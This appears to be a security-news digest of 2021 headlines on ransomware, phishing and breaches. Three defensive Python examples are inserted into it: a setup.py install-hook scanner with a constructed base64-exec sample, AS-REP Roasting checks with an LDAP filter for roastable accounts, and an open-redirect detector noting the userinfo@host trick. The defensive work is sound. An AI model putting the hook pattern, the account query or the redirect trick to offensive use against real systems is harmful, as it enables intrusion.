Attackers Encrypt VMware ESXi Server With Python Ransomware Full Text
Abstract
According to Sophos, the script contains multiple hardcoded encryption keys, and a routine for generating even more keys, which led the researchers to the conclusion that the ransomware creates a unique key at each run.Security Week
October 8, 2021
Hydra Spreads Tentacles to Target European Banks Full Text
Abstract
MalwareHunterTeam reported a new campaign spreading Hydra banking trojan across European banking platforms, specifically customers of Germany’s second-largest financial institution. The malware uses different encryption methods to avoid detection, along with the use of Tor for communication. ... Read MoreCyware Alerts - Hacker News
October 08, 2021
Engineering giant Weir Group hit by ransomware attack Full Text
Abstract
Scottish multinational engineering firm Weir Group has disclosed what it called an "attempted ransomware attack" that led to "significant temporary disruption" in the second half of September.BleepingComputer
October 07, 2021
Google warns 14,000 Gmail users targeted by Russian hackers Full Text
Abstract
Google has warned about 14,000 of its users about being targeted in a state-sponsored phishing campaign from APT28, a threat group that has been linked to Russia.BleepingComputer
October 07, 2021
FIN12 hits healthcare with quick and focused ransomware attacks Full Text
Abstract
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets.BleepingComputer
October 06, 2021
Twitch hack allegedly includes source code and earnings for streamers Full Text
Abstract
Online video game streaming service Twitch suffered a hack on Wednesday that leaked source code, user payouts and earnings for streamers, The Wall Street Journal reported.The Hill
October 6, 2021
LANtenna attack allows exfiltrating data from Air-Gapped systems via Ethernet cables Full Text
Abstract
Boffins devised a new technique, dubbed LANtenna, to exfiltrate data from systems in air-gapped networks using Ethernet cables as a "transmitting antenna." Security researchers from the Cyber Security Research Center in the Ben Gurion University...Security Affairs
October 06, 2021
Fired IT admin revenge-hacks school by wiping data, changing passwords Full Text
Abstract
A 29-year old wiped data on systems of a secondary school in the U.K. and changed the passwords at an IT company, in retaliatory cyber attacks for being fired.BleepingComputer
October 4, 2021
LockBit 2.0 ransomware hit Israeli defense firm E.M.I.T. Aviation Consulting Full Text
Abstract
Israeli Aerospace & Defense firm E.M.I.T. Aviation Consulting Ltd. was hit by LockBit 2.0 ransomware, operators will leak files on 07 Oct, 2021. LockBit 2.0 ransomware operators hit the Israeli aerospace and defense firm E.M.I.T. Aviation Consulting...Security Affairs
October 1, 2021
Baby died at Alabama Springhill Medical Center due to cyber attack Full Text
Abstract
A baby allegedly received inadequate childbirth care, and later died, at Springhill Medical Center in Alabama because of a ransomware attack. An Alabama woman named Teiranni Kidd has filed suit after the death of her baby, claiming that the Springhill...Security Affairs
October 01, 2021
MoneyLion locks customer accounts after credential stuffing attacks Full Text
Abstract
The banking and investing platform MoneyLion had to lock customer accounts that were breached in credential stuffing attacks over the summer, in June and July.BleepingComputer
October 1, 2021
Hydra Android Trojan Campaign Targets Customers of Commerzbank and other European Banks Full Text
Abstract
Threat actors set up a page posing as the official CommerzBank page and registered multiple domains on the same IP address. Crooks used the fake website to spread fake CommerzBank apps.Security Affairs
September 30, 2021
JVCKenwood hit by Conti ransomware claiming theft of 1.5TB data Full Text
Abstract
JVCKenwood has suffered a Conti ransomware attack where the threat actors claim to have stolen 1.7 TB of data and are demanding a $7 million ransom.BleepingComputer
September 30, 2021
Proxy Phantom: Fraud rings flood online merchants with credential stuffing attacks Full Text
Abstract
Fraud prevention company Sift said the ring, dubbed Proxy Phantom, is using over 1.5 million sets of stolen account credentials in automated credential stuffing attacks against online merchants.ZDNet
September 27, 2021
Escalating Conti Ransomware Attacks Major Cause of Concern Full Text
Abstract
CISA, the FBI, and the NSA published a joint alert warning organizations of increased Conti activity. It states that the ransomware has so far been used in more than 400 attacks in the U.S. and other countries.Cyware Alerts - Hacker News
September 26, 2021
Port of Houston was hit by an alleged state-sponsored attack Full Text
Abstract
Last month, the Port of Houston, one of the major US ports, was hit by a cyber attack allegedly orchestrated by a nation-state actor. One of the major US ports, the Port of Houston, revealed that it was hit by a cyber attack in August that had no impact...Security Affairs
September 26, 2021
JSC GREC Makeyev and other Russian entities under attack Full Text
Abstract
A cyberespionage campaign hit multiple Russian organizations, including JSC GREC Makeyev, a major defense contractor, exploiting a recently disclosed zero-day. Security researchers from Malwarebytes uncovered multiple attacks targeting many Russian...Security Affairs
September 25, 2021
GSS, one of the major European call center providers, suffered a ransomware attack Full Text
Abstract
The customer care and call center provider GSS has suffered a ransomware attack that crippled its systems and impacted its Spanish-speaking customers. GSS customer care and call center provider has suffered a ransomware attack that crippled its system...Security Affairs
September 25, 2021
Port of Houston Target of Suspected Nation-State Hack Full Text
Abstract
The Port of Houston, a critical piece of infrastructure along the Gulf Coast, issued a statement saying it had successfully defended against an attempted hack in August and “no operational data or systems were impacted.”Security Week
September 24, 2021
United Health Centers ransomware attack claimed by Vice Society Full Text
Abstract
California-based United Health Centers suffered a ransomware attack that reportedly disrupted all of their locations and resulted in patient data theft.BleepingComputer
September 24, 2021
Targeted Attacks Launched Against Government Personnel in India Using Commercial RATs Full Text
Abstract
The lures used in this campaign are predominantly themed around operational documents and guides such as those pertaining to the "Kavach" (Hindi for "armor") 2FA application operated by India's NIC.Cisco Talos
September 23, 2021
Crystal Valley hit by ransomware attack, it is the second farming cooperative shut down in a week Full Text
Abstract
Minnesota-based farming supply cooperative Crystal Valley was hit by a ransomware attack, it is the second attack against the agriculture business in a few days. Minnesota farming supply cooperative Crystal Valley has suffered a ransomware attack,...Security Affairs
September 22, 2021
Crystal Valley Farm Coop Hit with Ransomware Full Text
Abstract
It’s the second agricultural business to be seized this week and portends a bitter harvest with yet another nasty jab at critical infrastructure.Threatpost
September 22, 2021
Ransomware Gangs Attack Missouri Delta Medical Center and Barlow Respiratory Hospital Full Text
Abstract
Barlow Respiratory Hospital said while the attack affected several IT systems, the hospital was able to continue to operate under its emergency procedures and patient care was not interrupted.HIPAA Journal
September 21, 2021
Israeli communications company hit by major cyberattack Full Text
Abstract
The company sent SMS messages to its clients on Sunday, saying that the perpetrators of the attack were "hackers from abroad." However, Voicenter claimed that the attack did not affect its work.Middleeast Monitor
September 21, 2021
Supply Chain Attacks via Open-Source Repositories Spike Full Text
Abstract
A report from Sonatype revealed that supply chain attacks on open-source public repositories have increased up to 650% year-over-year. The security firm has mentioned that the significant increase in supply-chain attacks has been mainly caused by the exploitation of flaws in popular open-source ec ... Read MoreCyware Alerts - Hacker News
September 21, 2021
Marketron marketing services hit by Blackmatter ransomware Full Text
Abstract
BlackMatter ransomware gang over the weekend hit Marketron, a business software solutions provider that serves more than 6,000 customers in the media industry.BleepingComputer
September 21, 2021
Iowa Farm Services Provider Targeted by BlackMatter Ransomware, Faces $5.9 Million Ransom Demand Full Text
Abstract
New Cooperative -- an Iowa-based farm service provider -- has been hit with a ransomware attack, continuing a streak of incidents affecting agricultural companies this year.ZDNet
September 20, 2021
Major agriculture group New Cooperative hit by ransomware attack Full Text
Abstract
Agriculture group New Cooperative group was hit by a ransomware attack over the weekend, potentially endangering operations of a company key to the agricultural supply chain.The Hill
September 20, 2021
US farmer cooperative hit by $5.9M BlackMatter ransomware attack Full Text
Abstract
U.S. farmers cooperative NEW Cooperative has suffered a BlackMatter ransomware attack demanding $5.9 million not to leak stolen data and provide a decryptor.BleepingComputer
September 20, 2021
Large phishing campaign targets EMEA and APAC governments Full Text
Abstract
Security researchers uncovered a large phishing campaign targeting multiple government departments in APAC and EMEA countries. Researchers from cybersecurity firm Cyjax uncovered a large phishing campaign targeting multiple government departments...Security Affairs
September 20, 2021
SSID Stripping Attacks Could Lead You to Fake Access Points Full Text
Abstract
SSID Stripping is a method that malicious attackers could use to fool users into connecting to fake Wireless Access Points (WAPs). It affects devices running macOS, iOS, Ubuntu, Windows, and Android.Cyware Alerts - Hacker News
September 20, 2021
A New Wave of Malware Attack Targeting Organizations in South America Full Text
Abstract
A spam campaign delivering spear-phishing emails aimed at South American organizations has retooled its techniques to include a wide range of commodity remote access trojans (RATs) and geolocation filtering to avoid detection, according to new research. Cybersecurity firm Trend Micro attributed the attacks to an advanced persistent threat (APT) tracked as APT-C-36 (aka Blind Eagle), a suspected South America espionage group that has been active since at least 2018 and previously known for setting its sights on Colombian government institutions and corporations spanning financial, petroleum, and manufacturing sectors. Primarily spread via fraudulent emails by masquerading as Colombian government agencies, such as the National Directorate of Taxes and Customs (DIAN), the infection chain commences when the message recipients open a decoy PDF or Word document that claims to be a seizure order tied to their bank accounts and click on a link that's been generated from a URL shortThe Hacker News
September 17, 2021
Malware Attack on Aviation Sector Uncovered After Going Unnoticed for 2 Years Full Text
Abstract
A targeted phishing campaign aimed at the aviation industry for two years may be spearheaded by a threat actor operating out of Nigeria, highlighting how attackers can carry out small-scale cyber offensives for extended periods of time while staying under the radar. Cisco Talos dubbed the malware attacks "Operation Layover," building on previous research from the Microsoft Security Intelligence team in May 2021 that delved into a "dynamic campaign targeting the aerospace and travel sectors with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT." "The actor […] doesn't seem to be technically sophisticated, using off-the-shelf malware since the beginning of its activities without developing its own malware," researchers Tiago Pereira and Vitor Ventura said . "The actor also buys the crypters that allow the usage of such malware without being detected, throughout the years it has useThe Hacker News
September 17, 2021
German Election body hit by a cyber attack Full Text
Abstract
A spokesman for the authority running Germany's September 26 general election confirmed that hackers briefly disrupted its website last month. Threat actors last month hit the website of the authority running Germany's September 26 general election,...Security Affairs
September 17, 2021
City of Yonkers attacked by ransomware but refuses to pay ransom Full Text
Abstract
Government employees at the City of Yonkers were denied access to their computers last week, after cybercriminals launched a ransomware attack. The city said that it refused to pay the ransom.IT Governance
September 15, 2021
Anonymous hacked the controversial, far-right web host Epik Full Text
Abstract
Anonymous claims to have hacked the controversial web hosting provider Epik, known for allowing far-right, neo-Nazi, and other extremist content. The Anonymous hacktivist collective has claimed to have hacked the controversial web hosting provider...Security Affairs
September 14, 2021
New Zloader attacks disable Windows Defender to evade detection Full Text
Abstract
An ongoing Zloader campaign uses a new infection chain to disable Microsoft Defender Antivirus (formerly Windows Defender) on victims' computers to evade detection.BleepingComputer
September 14, 2021
BlackMatter Ransomware Hits Japanese Tech Giant Olympus Full Text
Abstract
The incident that occurred Sept. 8 and affected its EMEA IT systems seems to signal a return to business as usual for ransomware groups.Threatpost
September 14, 2021
Researchers Unearth Logic Bomb Attack in Python Package Index (PyPI) Full Text
Abstract
The researchers found six malicious payloads, all uploaded by a single user. The attacker designed them to run during a package’s installation. People have collectively downloaded these payloads around 5,000 times.Security Intelligence
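The install-time execution the report describes is the thing a reviewer can check for before installing a package: setuptools runs any command class registered through setup(cmdclass=...) during pip install, so a class that subclasses install or develop and overrides run() executes arbitrary code on the installing host. The following Python is an added example written for this page, not code from the report or from PyPI; it triages a setup.py text with the standard ast module and flags such install hooks, a cmdclass= argument, and calls that packaging scripts rarely need but install-time payloads usually do (exec, base64.b64decode, subprocess.*). The two setup.py texts it runs over are constructed samples, not the malicious packages from the report.

```python
"""Added example (not from the report): static triage of a setup.py for
install-time code. The setup.py texts at the bottom are constructed."""
import ast

# setuptools commands that pip runs during installation; subclassing one of
# these and overriding run() is the usual way to execute code at install time.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext"}

# Calls a packaging script rarely needs but install-time payloads usually do.
RISKY_CALLS = {
    "exec", "eval", "compile", "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "base64.b64decode",
    "urllib.request.urlopen", "socket.socket",
}


def _dotted(node):
    """Render a call target such as os.system as a dotted string, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def triage_setup_py(source: str):
    """Return sorted (lineno, reason) findings for a setup.py source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # base may be written as `install` or `setuptools.command.install.install`
            bases = {(_dotted(b) or "").split(".")[-1] for b in node.bases}
            hooked = bases & INSTALL_COMMANDS
            overrides_run = any(
                isinstance(f, ast.FunctionDef) and f.name == "run" for f in node.body
            )
            if hooked and overrides_run:
                findings.append((node.lineno, f"class {node.name} overrides run() of "
                                 f"{'/'.join(sorted(hooked))}; runs at pip install"))
        elif isinstance(node, ast.Call):
            target = _dotted(node.func)
            if target in RISKY_CALLS:
                findings.append((node.lineno, f"call to {target}"))
            if target == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno,
                                 "setup() registers cmdclass (custom install-time commands)"))
    return sorted(findings)


# Constructed sample: a plain declarative setup.py, nothing runs at install time.
BENIGN = '''
from setuptools import setup, find_packages
setup(name="tidyutils", version="1.0.2", packages=find_packages())
'''

# Constructed sample: the install hook shape, with a base64-wrapped exec payload.
SUSPECT = '''
import base64
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("cHJpbnQoJ2hpJyk="))

setup(name="tidyutils", version="1.0.3", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage_setup_py(text))
```

A clean result from this kind of triage does not prove a package safe (payloads can also hide in the package's modules or in a native extension build), but a cmdclass hook with exec or a decoder in run() is the pattern worth stopping on before running pip install.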
September 13, 2021
New Spook.js attack bypasses Google Chrome Site Isolation protections Full Text
Abstract
Spook.js is a new side-channel attack on modern processors that can allow bypassing Site Isolation protections implemented in Google Chrome. Boffins devised a transient side-channel attack on modern processors, "Spook.js," that can be abused by threat...Security Affairs
September 13, 2021
Hacker-made Linux Cobalt Strike beacon used in ongoing attacks Full Text
Abstract
An unofficial Cobalt Strike Beacon Linux version made by unknown threat actors from scratch has been spotted by security researchers while actively used in attacks targeting organizations worldwide.BleepingComputer
September 13, 2021
BlackMatter ransomware hits medical technology giant Olympus Full Text
Abstract
Olympus, a leading medical technology company, is investigating a "potential cybersecurity incident" that impacted some of its EMEA (Europe, Middle East, Africa) IT systems last week.BleepingComputer
September 13, 2021
New SpookJS Attack Bypasses Google Chrome’s Site Isolation Protection Full Text
Abstract
A newly discovered side-channel attack demonstrated on modern processors can be weaponized to successfully overcome Site Isolation protections weaved into Google Chrome and Chromium browsers and leak sensitive data in a Spectre-style speculative execution attack. Dubbed " Spook.js " by academics from the University of Michigan, University of Adelaide, Georgia Institute of Technology, and Tel Aviv University, the technique is a JavaScript-based line of attack that specifically aims to get around barriers Google put in place after Spectre and Meltdown vulnerabilities came to light in January 2018, thereby potentially preventing leakage by ensuring that content from different domains is not shared in the same address space. "An attacker-controlled webpage can know which other pages from the same websites a user is currently browsing, retrieve sensitive information from these pages, and even recover login credentials (e.g., username and password) when they are auThe Hacker News
September 13, 2021
Department of Justice and Constitutional Development of South Africa hit by a ransomware attack Full Text
Abstract
A ransomware attack hit the Department of Justice and Constitutional Development of South Africa. Multiple services including email and bail services were impacted by the ransomware attack.Security Affairs
September 13, 2021
Department of Justice and Constitutional Development of South Africa hit by a ransomware attack Full Text
Abstract
The Department of Justice and Constitutional Development of South Africa was hit by a ransomware attack that crippled bail services. A ransomware attack hit the Department of Justice and Constitutional Development of South Africa, multiple services,...Security Affairs
September 13, 2021
LockBit 2.0: Ransomware Attacks Surge After Successful Affiliate Recruitment Full Text
Abstract
After a brief slowdown in activity from the LockBit ransomware gang following increased attention from law enforcement, LockBit is back with a new affiliate program, improved payloads and a change in infrastructure.Security Intelligence
September 11, 2021
REvil ransomware is back in full attack mode and leaking data Full Text
Abstract
The REvil ransomware gang has fully returned and is once again attacking new victims and publishing stolen files on a data leak site.BleepingComputer
September 10, 2021
Experts confirmed that the networks of the United Nations were hacked earlier this year Full Text
Abstract
The United Nations this week confirmed that its computer networks were hit by a cyberattack earlier this year, as first reported by Bloomberg. The United Nations on Thursday confirmed that its computer networks were hit by a cyberattack earlier this...Security Affairs
September 10, 2021
Virginia National Guard confirms cyberattack hit Virginia Defense Force email accounts Full Text
Abstract
Email accounts connected to the Virginia Defense Force and the Virginia Department of Military Affairs were impacted by a cyberattack in July, according to a spokesperson from the Virginia National Guard.ZDNet
September 9, 2021
BladeHawk Attackers Target Kurds with Android Apps Full Text
Abstract
Pro-Kurd Facebook profiles deliver ‘888 RAT’ and ‘SpyNote’ trojans, masked as legitimate apps, to perform mobile espionage.Threatpost
September 9, 2021
Jenkins discloses attack on its Atlassian Confluence service Full Text
Abstract
Attackers abused an Object-Graph Navigation Language (OGNL) injection flaw – the same vulnerability type involved in the notorious 2017 Equifax hack – capable of leading to remote code execution (RCE) in Confluence Server and Data Center instances.IT Security Guru
September 08, 2021
Experts Uncover Mobile Spyware Attacks Targeting Kurdish Ethnic Group Full Text
Abstract
Cybersecurity researchers on Tuesday released new findings that reveal a year-long mobile espionage campaign against the Kurdish ethnic group to deploy two Android backdoors that masquerade as legitimate apps. Active since at least March 2020, the attacks leveraged as many as six dedicated Facebook profiles that claimed to offer tech and pro-Kurd content — two aimed at Android users while the other four appeared to provide news for the Kurdish supporters — only to share links to spying apps on public Facebook groups. All the six profiles have since been taken down. "It targeted the Kurdish ethnic group through at least 28 malicious Facebook posts that would lead potential victims to download Android 888 RAT or SpyNote," ESET researcher Lukas Stefanko said . "Most of the malicious Facebook posts led to downloads of the commercial, multi-platform 888 RAT, which has been available on the black market since 2018." The Slovakian cybersecurity firm attributed the atThe Hacker News
September 8, 2021
Researchers Uncover Email Fraud Campaigns Using Social Engineering Tactics to Steal Crypto Assets Full Text
Abstract
Victims are tempted by the promise of a considerable amount of cryptocurrency. Cashing out the full balance requires them to deposit some Bitcoin to the platform, which is the point of the scheme.Proofpoint
September 8, 2021
Bridgeport city government hacked, residents put on notice Full Text
Abstract
Residents of Bridgeport have been notified city government was hacked in late May of this year. A letter to residents said city IT systems were encrypted in a ransomware attack.WAJR
September 7, 2021
Jenkins Hit as Atlassian Confluence Cyberattacks Widen Full Text
Abstract
Patch now: The popular biz-collaboration platform is seeing mass scanning and exploitation just two weeks after a critical RCE bug was disclosed.Threatpost
September 07, 2021
Howard University hit with ransomware attack, cancels classes Full Text
Abstract
Howard University announced the cancellation of classes after being hit with a ransomware attack last week, though it said there was no evidence of personal information being stolen.The Hill
September 7, 2021
A server of the Jenkins project hacked by exploiting a Confluence flaw Full Text
Abstract
The development team behind the Jenkins server disclosed a security breach: threat actors deployed a cryptocurrency miner on one of its servers. The development team behind the Jenkins Project disclosed a security breach after threat actors compromised...Security Affairs
September 6, 2021
German foreign ministry: Russia responsible for cyber attacks on German parliament Full Text
Abstract
The German government has revealed that it has reliable information according to which Ghostwriter activities can be attributed to cyber protagonists of the Russian state or Russia's GRU military intelligence.Reuters
September 5, 2021
Pacific City Bank hit by AVOS Locker Ransomware Full Text
Abstract
Pacific City Bank was hit by AVOS Locker Ransomware operators; the gang claims to have stolen sensitive files from the company and threatens to leak them. Pacific City Bank is an American community bank that focuses on the Korean-American community...Security Affairs
September 4, 2021
Autodesk Says Company Was Targeted by SolarWinds Attackers Full Text
Abstract
Autodesk, a California-based design software and 3D technology firm, has acknowledged that it was one of several tech and security companies targeted by a Russian-linked group that carried out the supply chain attack against SolarWinds.Gov Info Security
September 3, 2021
Attacks against SolarWinds Serv-U SW were possible due to the lack of ASLR mitigation Full Text
Abstract
SolarWinds did not enable an anti-exploit mitigation available since 2006, allowing threat actors to target SolarWinds Serv-U FTP software in July attacks. Software vendor SolarWinds did not enable ASLR, an anti-exploit mitigation that was available since...Security Affairs
September 02, 2021
What is AS-REP Roasting attack, really? Full Text
Abstract
Microsoft's Active Directory is said to be used by 95% of Fortune 500. As a result, it is a prime target for attackers as they look to gain access to credentials in the organization, as compromised credentials provide one of the easiest ways for hackers to access your data. A key authentication technology that underpins Microsoft Active Directory is Kerberos. Unfortunately, hackers use many different attacks against Active Directory's implementation of the Kerberos authentication protocol. One of those is AS-REP Roasting. So what is AS-REP Roasting, and how can businesses protect themselves? What is Active Directory Kerberos? Kerberos was originally developed by the Massachusetts Institute of Technology (MIT) and centered around using tickets to establish trust. Microsoft's implementation of Kerberos found in Active Directory is based on Kerberos Network Authentication Service (V5) as defined in RFC 4120 . However, Microsoft has added to and enhanced Kerberos with itThe Hacker News
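As an added example (not from the article above or from Microsoft), the two checks a defender would run against the weakness AS-REP Roasting exploits: accounts whose userAccountControl carries the DONT_REQ_PREAUTH flag (0x400000) hand out an AS-REP whose encrypted part is derived from the account's password without the requester proving anything, so it can be cracked offline; and on the domain controller such requests show up as Event ID 4768 with Pre-Authentication Type 0, usually with RC4-HMAC (0x17) requested because it is the cheapest to brute force. The directory records, event records, account names and addresses are constructed sample data; the LDAP filter string is the equivalent query for a live domain but no directory call is made.

```python
"""Added example, not from The Hacker News article: two checks for AS-REP Roasting.

An account flagged DONT_REQ_PREAUTH (userAccountControl bit 0x400000) gets
an AS-REP whose enc-part is encrypted under its password-derived key without
the requester proving the password first, so anyone can request it and crack
it offline. On the KDC side such a request is logged as Event ID 4768 with
Pre-Authentication Type 0; cracking tools usually ask for RC4-HMAC
(Ticket Encryption Type 0x17) because it is the cheapest to brute force.
Directory records and events below are constructed sample data."""

DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag
ACCOUNTDISABLE = 0x2
RC4_HMAC = 0x17

# LDAP filter for the same check against a live domain (1.2.840.113556.1.4.803 is
# the bitwise-AND matching rule); kept as a string here, no directory call is made.
ROASTABLE_LDAP_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
)

SAMPLE_ACCOUNTS = [  # constructed; hypothetical account names
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x400200},  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    {"sAMAccountName": "jdoe",       "userAccountControl": 0x200},     # pre-auth required
    {"sAMAccountName": "old_svc",    "userAccountControl": 0x400202},  # flag set but account disabled
]


def roastable_accounts(accounts):
    """Enabled accounts that do not require Kerberos pre-authentication."""
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & DONT_REQ_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    )


def _num(v):
    """Event fields arrive as '0x17' / '0' strings from the Security log, or as ints."""
    return v if isinstance(v, int) else int(str(v), 0)


SAMPLE_4768 = [  # constructed; field names as in the 4768 event XML
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.5.23"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.1.10"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.7.4"},
    {"EventID": 4769, "TargetUserName": "jdoe", "PreAuthType": "-",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.1.10"},
]


def asrep_roast_candidates(events):
    """4768 events with no pre-authentication (PreAuthType 0).

    Returns (user, source ip, rc4_requested). A PreAuthType 0 request for a
    roastable account is expected only from the few clients that genuinely
    cannot do pre-auth; RC4 on top of it is the usual cracking-tool signature."""
    hits = []
    for e in events:
        if _num(e.get("EventID", -1)) != 4768:
            continue  # checked first: non-4768 events carry '-' in PreAuthType
        if _num(e["PreAuthType"]) != 0:
            continue
        ip = e["IpAddress"]
        ip = ip[len("::ffff:"):] if ip.startswith("::ffff:") else ip
        hits.append((e["TargetUserName"], ip,
                     _num(e["TicketEncryptionType"]) == RC4_HMAC))
    return hits
```

The account check is the preventive side (clear the flag, or give the account a long random password if some legacy client forces it to stay); the event check is the detective side. Pair it with a baseline of which source addresses legitimately send pre-auth-less requests, otherwise the first rule fires on every logon from such a client.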
September 2, 2021
Comcast RF Attack Leveraged Remotes for Surveillance Full Text
Abstract
IoT vulnerabilities turned the remote into a listening device, researchers found, which impacted 18 million Xfinity customers.Threatpost
September 02, 2021
Autodesk reveals it was targeted by Russian SolarWinds hackers Full Text
Abstract
Autodesk has confirmed that it was also targeted by the Russian state hackers behind the large-scale SolarWinds Orion supply-chain attack, almost nine months after discovering that one of its servers was backdoored with Sunburst malware.BleepingComputer
September 1, 2021
Feds Warn of Ransomware Attacks Ahead of Labor Day Full Text
Abstract
Threat actors recently have used long holiday weekends — when many staff are taking time off — as a prime opportunity to ambush organizations.Threatpost
August 30, 2021
T-Mobile Hack Involved Exposed Router, Specialized Tools and Brute Force Attacks Full Text
Abstract
Mike Sievert, CEO of T-Mobile, said that while the company’s investigation into the incident was “substantially complete,” he could not share too many technical details due to ongoing criminal probe.Security Week
August 30, 2021
Boston Public Library discloses cyberattack Full Text
Abstract
The Boston Public Library was the victim of a cyberattack that crippled its computer network, the library revealed in a statement Friday. The Boston Public Library announced on Friday that it was hit by a cyberattack that compromised its computer network....Security Affairs
August 30, 2021
New variant of Konni RAT used in a campaign that targeted Russia Full Text
Abstract
So far, Konni RAT has managed to evade detection, as only 3 security solutions on VirusTotal were able to detect the malware. Researchers from Malwarebytes Labs spotted an ongoing malware campaign that is targeting Russia with the Konni RAT. Security...Security Affairs
August 28, 2021
Microsoft Warns of Widespread Phishing Attacks Using Open Redirects Full Text
Abstract
Microsoft is warning of a widespread credential phishing campaign that leverages open redirector links in email communications as a vector to trick users into visiting malicious websites while effectively bypassing security software. "Attackers combine these links with social engineering baits that impersonate well-known productivity tools and services to lure users into clicking," Microsoft 365 Defender Threat Intelligence Team said in a report published this week. "Doing so leads to a series of redirections — including a CAPTCHA verification page that adds a sense of legitimacy and attempts to evade some automated analysis systems — before taking the user to a fake sign-in page. This ultimately leads to credential compromise, which opens the user and their organization to other attacks." Although redirect links in email messages serve as a vital tool to take recipients to third-party websites or track click rates and measure the success of sales and marketinThe Hacker News
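As an added example (not from Microsoft's report), both sides of the open-redirect problem this campaign abuses: a mail-analysis check that extracts the foreign host hidden in a redirector link's query string, and the server-side validation a redirector should apply to a user-supplied `next`/`url` parameter so that it cannot be used this way. The hostnames, link formats and the allowlist of known click-tracking hosts are constructed; a real deployment would load the allowlist from the mail-security platform's own list of legitimate tracking domains.

```python
"""Added example, not from Microsoft's report: the two sides of the open-redirect
problem this campaign abuses.

external_destination() is for the mail-analysis side: given a link from a
message, return the foreign host hidden in a query parameter, if any. The
phishing links use a legitimate domain's redirector, so the visible host is
trusted while the real destination is elsewhere.

safe_redirect_target() is the server-side check a redirector should apply to a
user-supplied 'next'/'url' parameter: same-site paths, or absolute URLs to an
allowlisted host, and nothing else. All URLs and host names are constructed."""

from urllib.parse import urlsplit, parse_qsl, unquote


def external_destination(link, known_trackers=()):
    """Return (param_name, host) for the first query parameter of `link` that is
    an absolute or scheme-relative URL to a host other than the link's own
    (subdomains of it excluded), or None.

    parse_qsl already percent-decodes once; the extra unquote() catches the
    double-encoded form used to slip past naive scanners."""
    parts = urlsplit(link)
    own = (parts.hostname or "").lower()
    if own in known_trackers:  # analyst-maintained allowlist of legitimate tracking hosts
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        dest = unquote(value).strip()
        if not dest.startswith(("http://", "https://", "//")):
            continue
        host = (urlsplit(dest).hostname or "").lower()
        if host and host != own and not host.endswith("." + own):
            return name, host
    return None


def safe_redirect_target(requested, allowed_hosts, default="/"):
    """Server side: honour only a local path or an allowlisted absolute URL."""
    target = requested.strip().replace("\\", "/")  # browsers treat '\' like '/'
    p = urlsplit(target)
    if p.scheme == "" and p.netloc == "":
        # Plain path. Reject '//...' explicitly even though urlsplit would have
        # given it a netloc: belt and braces against parser differences.
        return target if target.startswith("/") and not target.startswith("//") else default
    if p.scheme in ("http", "https") and (p.hostname or "").lower() in allowed_hosts:
        return target
    return default  # javascript:, data:, scheme-relative and foreign hosts all land here
```

The detector deliberately scans every query parameter rather than a fixed list of names, because redirector parameter names vary by vendor; the cost is that legitimate marketing trackers also match, which is why the allowlist exists. On the server side, note that the `userinfo@host` trick (`https://trusted.example@evil.example/`) is caught because `hostname` returns the real host, not the decoy before the `@`.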
August 28, 2021
Boffins show PIN bypass attack against Mastercard and Maestro contactless payments Full Text
Abstract
Boffins from the Swiss ETH Zurich university demonstrated a PIN bypass attack on contactless cards from Mastercard and Maestro. A group of researchers from the Swiss ETH Zurich university has discovered a vulnerability that allowed them to bypass...Security Affairs
August 27, 2021
Victims of Ragnarok ransomware can decrypt their files for free Full Text
Abstract
Ragnarok ransomware operators are ceasing their operations and released the master key that can allow their victims to decrypt files for free. The Ragnarok ransomware group has been active since at least January 2020 and hit dozens of organizations...Security Affairs
August 27, 2021
China’s Microsoft Hack May Have Had A Bigger Purpose Than Just Spying Full Text
Abstract
The China-linked cyber intruders broke into Exchange by finding a handful of coding errors that gave them entry into Exchange servers and then allowed them to take control.NPR
August 26, 2021
Microsoft Breaks Silence on Barrage of ProxyShell Attacks Full Text
Abstract
versions of the software are affected by a spate of bugs under active exploitation.Threatpost
August 26, 2021
Singapore Eye Clinic Suffers Ransomware Attack Impacting Patients’ Personal Information Full Text
Abstract
A ransomware attack earlier this month has affected the personal data and clinical information of nearly 73,500 patients of a private eye clinic, the third such reported incident in a month.Straits Times
August 24, 2021
The Proliferation of LockBit 2.0 Attacks Full Text
Abstract
According to the latest telemetry by Trend Micro, researchers revealed that they had detected multiple LockBit 2.0 attack attempts in Chile, Italy, Taiwan, and the U.K.Cyware Alerts - Hacker News
August 24, 2021
Resurgence in FluBot Malware Attacks Full Text
Abstract
Recent studies on the FluBot banking malware confirmed that there has been a spike in the number of malicious distribution pages affecting a number of Australian, Polish, and German banks.Cyware Alerts - Hacker News
August 24, 2021
A Year-Long Spear-Phishing Campaign Ensnares Office 365 Users Full Text
Abstract
